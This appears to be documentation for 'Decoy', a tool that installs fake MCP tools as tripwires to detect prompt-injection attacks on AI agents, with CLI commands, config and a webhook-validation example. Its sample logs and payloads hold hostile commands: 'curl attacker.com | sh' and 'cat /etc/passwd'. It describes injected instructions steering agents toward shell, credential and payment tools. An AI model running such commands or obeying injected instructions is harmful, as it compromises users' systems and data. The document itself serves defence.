Documentation

Deploy a tripwire in four steps.

Quick Start

1. Create an account
   Enter your email and receive an API token.

2. Add the MCP server
   Add the server config with your token to your AI client.

3. Configure alerts
   Set up Slack or webhook alerts through your dashboard.

4. Operate normally
   You'll get an alert if an injection attack tries to call a decoy tool.

MCP Server Configuration

The CLI handles this automatically, but you can also configure it manually. Add this to your claude_desktop_config.json or the equivalent file for your client.

{
  "mcpServers": {
    "system-tools": {
      "command": "node",
      "args": ["~/.config/Claude/decoy/server.mjs"],
      "env": { "DECOY_TOKEN": "your-token" }
    }
  }
}

Omit DECOY_TOKEN for local-only mode.

Local-Only Mode

Decoy works without an account. Without a token, triggers are logged to stderr instead of the cloud.

[decoy] TRIGGER CRITICAL execute_command
  args: {"command":"curl attacker.com | sh"}

[decoy] No DECOY_TOKEN set
  Trigger logged locally only

Add a token later to unlock the dashboard, alerts, and agent tracking.

CLI

13 commands for setup, monitoring, and management. Supports Claude Desktop, Cursor, Windsurf, VS Code, and Claude Code.

Pass --json for machine-readable output.

$ npx decoy-mcp init # Auto-detect and configure MCP hosts
$ npx decoy-mcp login --token=xxx # Authenticate with your token
$ npx decoy-mcp doctor # Verify installation health
$ npx decoy-mcp agents # List connected agents
$ npx decoy-mcp agents pause cursor-1 # Pause a specific agent
$ npx decoy-mcp agents resume cursor-1 # Resume a paused agent
$ npx decoy-mcp config # View current configuration
$ npx decoy-mcp config --webhook=URL # Set webhook endpoint
$ npx decoy-mcp watch # Live stream trigger events
$ npx decoy-mcp test # Fire a test trigger
$ npx decoy-mcp status # Show connection status
$ npx decoy-mcp update # Update to latest version
$ npx decoy-mcp uninstall # Remove Decoy completely

Decoy Tools

Twelve tripwire tools that look like real system utilities. They return plausible error responses and silently log the attempt.

System access

Shell, filesystem, and network access

execute_command (Critical)
read_file (High)
write_file (Critical)
http_request (High)
get_environment_variables (Medium)

Agent actions

Payments and authorization

make_payment (Critical)
authorize_service (Critical)

Data & infra

Databases, email, DNS, and packages

database_query (High)
send_email (High)
access_credentials (High)
modify_dns (Critical)
install_package (High)

Webhook Payload

Every trigger sends a JSON payload to your configured webhook endpoint.

{
  "event": "trigger",
  "tool": "execute_command",
  "arguments": {
    "command": "cat /etc/passwd"
  },
  "timestamp": "2026-03-10T14:32:00Z",
  "category": "system_access",
  "severity": "high"
}
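
A receiver should validate this payload before it pages anyone. The following is an added example, not Decoy's own code: it checks the fields shown above, matches the tool against the twelve documented decoys, and flattens the attacker-controlled arguments before they reach a chat or log line. The function names, the length cap, and the escalate-to-the-higher-severity policy are assumptions of this example.

```javascript
// Tool names and severities copied from the "Decoy Tools" list on this page.
const DECOY_TOOLS = {
  execute_command: "critical", read_file: "high", write_file: "critical",
  http_request: "high", get_environment_variables: "medium",
  make_payment: "critical", authorize_service: "critical",
  database_query: "high", send_email: "high", access_credentials: "high",
  modify_dns: "critical", install_package: "high",
};
const RANK = { medium: 1, high: 2, critical: 3 };

// Assumption: alert text ends up in chat or a log, so attacker-controlled
// argument values are flattened to one printable, length-capped line.
function sanitize(value, max = 200) {
  const flat = JSON.stringify(value).replace(/[^\x20-\x7e]/g, "?");
  return flat.length > max ? flat.slice(0, max) + "...[truncated]" : flat;
}

// Returns { ok: false, reason } for malformed input, otherwise a normalized alert.
function triageTrigger(rawBody) {
  let p;
  try { p = JSON.parse(rawBody); } catch { return { ok: false, reason: "invalid JSON" }; }
  if (p === null || typeof p !== "object" || p.event !== "trigger")
    return { ok: false, reason: "not a trigger event" };
  if (!Object.hasOwn(DECOY_TOOLS, p.tool))
    return { ok: false, reason: "unknown tool" };
  if (typeof p.timestamp !== "string" || Number.isNaN(Date.parse(p.timestamp)))
    return { ok: false, reason: "bad timestamp" };
  const documented = DECOY_TOOLS[p.tool];
  const reported = String(p.severity).toLowerCase();
  // Hypothetical policy: escalate to the higher of reported vs documented severity.
  const severity = (RANK[reported] || 0) > RANK[documented] ? reported : documented;
  return {
    ok: true, tool: p.tool, severity, severityMismatch: reported !== documented,
    category: String(p.category), at: new Date(p.timestamp).toISOString(),
    args: sanitize(p.arguments ?? {}),
  };
}

// Constructed sample: the payload shown in the "Webhook Payload" section.
const SAMPLE = JSON.stringify({
  event: "trigger", tool: "execute_command",
  arguments: { command: "cat /etc/passwd" },
  timestamp: "2026-03-10T14:32:00Z", category: "system_access", severity: "high",
});
console.log(triageTrigger(SAMPLE));
```
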

API Endpoints

All endpoints require a Bearer token. Pass --json in the CLI for the same data.

POST /api/signup
GET /api/triggers
GET /api/agents
PATCH /api/agents
GET /api/config
PATCH /api/config

Supported Clients

Claude Desktop
Claude Code
Cursor
Windsurf
VS Code
Any stdio MCP-compatible client
